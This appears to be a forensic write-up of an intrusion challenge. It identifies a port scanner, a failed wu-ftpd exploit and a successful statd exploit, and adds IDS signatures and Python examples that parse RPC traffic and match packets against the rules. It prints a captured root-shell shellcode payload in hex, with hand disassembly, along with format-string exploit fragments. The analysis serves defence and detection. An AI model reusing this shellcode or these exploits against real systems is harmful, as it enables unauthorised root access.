Max Vision

QUESTION #1: Can you name the FTP scanning tool?

Job was right, it is almost certainly the "myscan" scanner written by Wahnsinn. I looked at the code, and there are numerous clues that this was the culprit (or similar code by the same author). This German scanner performs single-packet OS fingerprinting based on a table of TCP window sizes. It has the following peculiarities/clues: initial TTL set to 255, TCP window size 0x200, zero TCP ack, and a conspicuous source port of 10101.

from myscan.c:

    ip_header->ttl = 255;
    tcp_header->th_win = htons(512);
    tcp_header->th_ack = htonl(0);

from myscan.h:

    #define SRC_PORT 10101 /* Client Port */

http://people.blinx.de/wahn/

QUESTION #2: What does this FTP exploit achieve? Does it open a port, create a shell, add a user account?

Basically it sets the real and effective userid to root, attempts a chroot escape, and spawns a shell to replace the exploited daemon.

Ah, I have since found the exact exploit. venglin did indeed release an update to bobek.c, which now has the exact matching shellcode (update dated August 5th 2000, but it wasn't released until recently). I didn't see the update because the filename was kept the same.

I had a look at the exploit capture and manually disassembled it. It basically sets the real and effective uid to root, then tries to break any possible chroot jail, then execs /bin/sh. This is pretty much literally exactly what it does, nothing more. Well, what it would have done if the exploit worked - it appears from the packet captures you have up that it was not successful.

The exploit is interesting to me for a few reasons: the shellcode isn't public (it's not in my archive), and someone has tacked on an invalid email address at the end of it. The name "venglin" is a likely exploit author (especially since he released a public remote wuftp exploit) but the domain is broken and not likely to have ever been valid.
This is likely a private exploit or a version that had a very small circulation. I have seen extremely similar functionality in shellcode before, but not quite the same coding. The following is basically the exploit packet in question, except that I just started separating out the hex into the assembly opcodes.

    12/09-01:22:31.167035 207.219.207.240:1882 -> 172.16.1.104:21
    TCP TTL:50 TOS:0x0 ID:53476 DF
    *****PA* Seq: 0x33BC72AD Ack: 0x110CE81E Win: 0x7D78
    TCP Options => NOP NOP TS: 126045057 105803098
    50 41 53 53 20 90 90 90 90 90 90 90 90 90 90 90  PASS ...........
    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
    90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
    90 90 90 90 90 90 90 ...
and the code started here, so I manually translate below (forgive my mish-mash of AT&T/Intel style commenting, just note the syscalls :)

    31 C0           xor eax,eax
    31 DB           xor ebx,ebx
    31 C9           xor ecx,ecx
    B0 46           mov al,0x46              setreuid()
    CD 80           int 0x80
    31 C0           xor eax,eax
    31 DB           xor ebx,ebx
    43              inc ebx
    89 D9           movl %ebx, %ecx
    41              incl %ecx
    B0 3F           movb $0x3f, %al          dup2()
    CD 80           int 0x80
    EB 6B           jmp SOMEWHERE
    5E              popl %esi
    31 C0           xor eax,eax
    31 C9           xor ecx,ecx
    8D 5E 01        leal 0x01(%esi), %ebx
    88 46 04        movb %al, 0x04(%esi)
    66 B9 FF FF 01  movw $0xffff, %cx
    B0 27           movb $0x27, %al          mkdir()
    CD 80           int 0x80
    31 C0           xor eax,eax
    8D 5E 01        leal 0x01(%esi), %ebx
    B0 3D           movb $0x3d, %al          chroot()
    CD 80           int 0x80
    31 C0           xor eax,eax
    31 DB           xor ebx,ebx
    8D 5E 08        leal 0x08(%esi), %ebx
    89 43 02        movl %eax, 0x02(%ebx)
    31 C9           xorl %ecx,%ecx
    FE C9           (dunno)
    31 C0           xor eax,eax
    8D 5E 08        leal 0x08(%esi), %ebx
    B0 0C           movb $0x0c, %al          chdir()
    CD 80           int 0x80
    FE C9           (dunno)
    75 F3           jnz SOMEWHERE
    31 C0           xor eax,eax
    88 46 09        movb %al, 0x09(%esi)
    8D 5E 08        leal 0x08(%esi), %ebx
    B0 3D           movb $0x3d, %al          chroot()
    CD 80           int 0x80
    FE 0E           (dunno)
    B0 30           movb $0x08, %al
    FE C8           (dunno)
    88 46 04        movb %al, 0x04(%esi)
    31 C0           xor eax,eax
    88 46 07        movb %al, 0x07(%esi)
    89 76 08        movl %esi, 0x08(%esi)
    89 46 0C        movl %eax, 0x0c(%esi)
    89 F3           movl %esi, %ebx
    8D 4E 08        leal 0x08(%esi),%ecx
    8D 56 0C        leal 0x0c(%esi),%edx
    B0 0B           movb $0x0b, %al          execve()
    CD 80           int 0x80
    31 C0           xor eax,eax
    31 DB           xor ebx,ebx
    B0 01           movb $0x01, %al          exit()
    CD 80           int 0x80
    E8 90           jmp SOMEWHERE
    FF FF FF FF FF FF
    30 62 69 6E 30 73 68 31 2E 2E 31 31 76           ...0bin0sh1..11v
    65 6E 67 6C 69 6E 40 6B 6F 63 68 61 6D 2E 6B 61  englin@kocham.ka
    73 69 65 2E 63 6F 6D 0D 0A                       sie.com..

QUESTION #3: Is the FTP attack successful?

Nope.

QUESTION #4: What RPC service is exploited?

The rpcinfo request is specifically asking for port information for rpc service 100024 (the hex code "01 86 B8"), which corresponds to rpc.statd. In response, portmap replies with the UDP port number 931.
The probe is the equivalent of `rpcinfo -u example.com 100024`.

QUESTION #5: Where in the exploit code below does the attacker bind a shell to port 39168?

I checked and the shellcode is an exact match for a published statd exploit called "statdx" by ron1n (Non-ripped linux IA32 portbinding shellcode ; port: 39168 ; length: 133 bytes). A newer version is available, perhaps the attacker will upgrade at some point :) I suspect it is actually the first version of ron1n's statdx instead of the newer statdx2, but I don't have time to check just now.

from statdx.c:

    tmp = sprintf(ptr, "%%%dx%%n", pad);

from statdx2.c:

    ptr += sprintf(ptr, "%%%ldx%%hn", pad);

QUESTION #6: What two accounts are created, and what are the UID's?

    user, uid 5000
    sendmail, uid 0

Summary:

    OS identification/portscan : "myscan" by Wahnsinn
    failed ftp exploit         : "PanBobek v1.1" by Venglin
    successful statd           : "statdx" (first version) by Ron1n

It's really hard to say if there is a connection between the two attacks. The Canadian IP address that tried the ftp exploit could be a totally different person than the successful exploiter coming from the Texas IP address.

Here are some signatures to detect these specific attacks in the future.

    alert TCP $EXTERNAL 10101 -> $INTERNAL any (msg: "IDS439/probe-myscan"; ttl: >220; ack: 0; flags: S;)
    alert TCP $EXTERNAL any -> $INTERNAL 21 (msg: "IDS440/ftp-wuftp260-linux-venglin-parbobek"; flags: AP; content: "|2e2e3131|venglin@";)
    alert TCP $EXTERNAL any -> $INTERNAL any (msg: "IDS442/rpc-statdx-exploit"; flags: AP; content: "/bin|c74604|/sh";)

:)
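The portmapper exchange behind question 4 (a GETPORT call for program 100024 and the reply naming UDP port 931), decoded with a small Sun RPC/XDR parser. This is an added example, not code from the post or from rpcinfo; the call and reply bytes are constructed here with AUTH_NULL credentials and an arbitrary XID of 0x2a2a2a2a, chosen only so the demo runs offline. A real capture would supply the two UDP payloads in place of CALL and REPLY.

```python
import struct

# Sun RPC v2 (RFC 1057) constants used by the portmapper GETPORT procedure.
PMAP_PROG, PMAP_VERS, PMAPPROC_GETPORT = 100000, 2, 3
IPPROTO_UDP = 17
RPC_CALL, RPC_REPLY = 0, 1
MSG_ACCEPTED, SUCCESS = 0, 0


def xdr_u32(buf, off):
    """Read one big-endian XDR unsigned int, returning (value, new offset)."""
    return struct.unpack("!I", buf[off:off + 4])[0], off + 4


def parse_getport_call(buf):
    """Decode a portmapper GETPORT call; return its arguments or None if it is not one."""
    off = 0
    xid, off = xdr_u32(buf, off)
    mtype, off = xdr_u32(buf, off)
    rpcvers, off = xdr_u32(buf, off)
    prog, off = xdr_u32(buf, off)
    _vers, off = xdr_u32(buf, off)
    proc, off = xdr_u32(buf, off)
    if mtype != RPC_CALL or rpcvers != 2 or prog != PMAP_PROG or proc != PMAPPROC_GETPORT:
        return None
    # Credentials and verifier are each an opaque_auth: flavor, length, body padded to 4.
    for _ in range(2):
        _flavor, off = xdr_u32(buf, off)
        length, off = xdr_u32(buf, off)
        off += (length + 3) & ~3
    target_prog, off = xdr_u32(buf, off)
    target_vers, off = xdr_u32(buf, off)
    target_prot, off = xdr_u32(buf, off)
    return {"xid": xid, "prog": target_prog, "vers": target_vers, "prot": target_prot}


def parse_getport_reply(buf):
    """Decode an accepted GETPORT reply; return (xid, port) or None."""
    off = 0
    xid, off = xdr_u32(buf, off)
    mtype, off = xdr_u32(buf, off)
    stat, off = xdr_u32(buf, off)
    if mtype != RPC_REPLY or stat != MSG_ACCEPTED:
        return None
    _flavor, off = xdr_u32(buf, off)          # verifier opaque_auth
    length, off = xdr_u32(buf, off)
    off += (length + 3) & ~3
    accept_stat, off = xdr_u32(buf, off)
    if accept_stat != SUCCESS:
        return None
    port, off = xdr_u32(buf, off)
    return xid, port


def build_getport_call(xid, prog, vers, prot):
    """Constructed GETPORT call with AUTH_NULL cred and verf (demo input only)."""
    header = struct.pack("!IIIIII", xid, RPC_CALL, 2, PMAP_PROG, PMAP_VERS, PMAPPROC_GETPORT)
    auth = struct.pack("!IIII", 0, 0, 0, 0)            # cred + verf, both empty
    args = struct.pack("!IIII", prog, vers, prot, 0)   # mapping: prog, vers, prot, port
    return header + auth + args


def build_getport_reply(xid, port):
    """Constructed accepted reply carrying the port the portmapper hands back."""
    return struct.pack("!IIIIIII", xid, RPC_REPLY, MSG_ACCEPTED, 0, 0, SUCCESS, port)


# Constructed exchange mirroring the one in the post: where does program
# 100024 (rpc.statd, 0x0186b8 on the wire) listen over UDP?  Answer: 931.
STATD_PROG = 0x0186B8   # == 100024
CALL = build_getport_call(0x2A2A2A2A, STATD_PROG, 1, IPPROTO_UDP)
REPLY = build_getport_reply(0x2A2A2A2A, 931)


def describe(call, reply):
    """Pair a call with its reply by XID and summarise the mapping it reveals."""
    req = parse_getport_call(call)
    if req is None:
        return "not a GETPORT call"
    res = parse_getport_reply(reply)
    if res is None or res[0] != req["xid"]:
        return "no matching accepted reply"
    return "GETPORT prog=%d vers=%d prot=%d -> port %d" % (req["prog"], req["vers"], req["prot"], res[1])


if __name__ == "__main__":
    print(describe(CALL, REPLY))
```

The program number is the field worth alerting on: a GETPORT for 100024 from outside the network is the reconnaissance step that precedes the statd exploit, and it is visible on UDP/TCP 111 before any exploit traffic reaches port 931.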
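The three signatures above, re-expressed as plain matching logic and run over constructed packets, so the conditions can be checked without a sensor. This is an added example, not the post's code and not Snort; the IPv4/TCP parser is minimal, checksums are left at zero, and the sample packets (source address 203.0.113.5, the pad lengths, the statd sample going to TCP 931) are constructed to resemble the capture in the post rather than copied from it.

```python
import struct

TCP_FIN, TCP_SYN, TCP_RST, TCP_PSH, TCP_ACK = 0x01, 0x02, 0x04, 0x08, 0x10


def build_packet(src, dst, sport, dport, ttl, flags, seq=0, ack=0, win=8192, payload=b""):
    """Build an IPv4+TCP packet as constructed test input (checksums zero, no options)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, win, 0, 0) + payload
    total = 20 + len(tcp)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total, 0, 0, ttl, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return ip + tcp


def parse_packet(pkt):
    """Return the header fields the rules need, or None if not IPv4/TCP."""
    vihl, _, total, _, _, ttl, proto, _, _, _ = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    if vihl >> 4 != 4 or proto != 6:
        return None
    ihl = (vihl & 0x0F) * 4
    t = pkt[ihl:]
    sport, dport, _seq, ack, off, flags, win, _, _ = struct.unpack("!HHIIBBHHH", t[:20])
    doff = (off >> 4) * 4
    return {"ttl": ttl, "sport": sport, "dport": dport, "ack": ack,
            "flags": flags, "win": win, "payload": t[doff:total - ihl]}


def match_rules(pkt):
    """Apply the post's three signatures; return the msg names that fire."""
    p = parse_packet(pkt)
    if p is None:
        return []
    hits = []
    # IDS439: myscan probe - source port 10101, ttl > 220, ack 0, flags exactly SYN.
    if p["sport"] == 10101 and p["ttl"] > 220 and p["ack"] == 0 and p["flags"] == TCP_SYN:
        hits.append("IDS439/probe-myscan")
    ap = (p["flags"] & (TCP_ACK | TCP_PSH)) == (TCP_ACK | TCP_PSH)
    # IDS440: ftp exploit - to port 21, AP flags, content |2e2e3131|venglin@ (".."+"11venglin@").
    if p["dport"] == 21 and ap and b"\x2e\x2e\x31\x31venglin@" in p["payload"]:
        hits.append("IDS440/ftp-wuftp260-linux-venglin-parbobek")
    # IDS442: statdx - any port, AP flags, content /bin|c74604|/sh.
    if ap and b"/bin\xc7\x46\x04/sh" in p["payload"]:
        hits.append("IDS442/rpc-statdx-exploit")
    return hits


# Constructed samples modelled on the capture described in the post.
MYSCAN_SYN = build_packet("203.0.113.5", "172.16.1.104", 10101, 21,
                          ttl=255, flags=TCP_SYN, win=0x200)
FTP_EXPLOIT = build_packet("203.0.113.5", "172.16.1.104", 1882, 21, ttl=50, flags=TCP_PSH | TCP_ACK,
                           payload=b"PASS " + b"\x90" * 32 + b"\xff" * 6
                                   + b"0bin0sh1..11venglin@kocham.kasie.com\r\n")
STATD_EXPLOIT = build_packet("203.0.113.5", "172.16.1.104", 1024, 931, ttl=50, flags=TCP_PSH | TCP_ACK,
                             payload=b"\x90" * 16 + b"/bin\xc7\x46\x04/sh\x00")
BENIGN_FTP = build_packet("203.0.113.5", "172.16.1.104", 40000, 21, ttl=64, flags=TCP_PSH | TCP_ACK,
                          payload=b"PASS hunter2\r\n")

if __name__ == "__main__":
    for name, pkt in [("myscan", MYSCAN_SYN), ("ftp", FTP_EXPLOIT),
                      ("statd", STATD_EXPLOIT), ("benign", BENIGN_FTP)]:
        print(name, match_rules(pkt))
```

Note that the myscan rule keys on header quirks (source port, TTL, zero ack) rather than payload, so it survives changes to the fingerprint table, while the two exploit rules key on bytes the shellcode must carry to work; the benign PASS packet exercises the negative case.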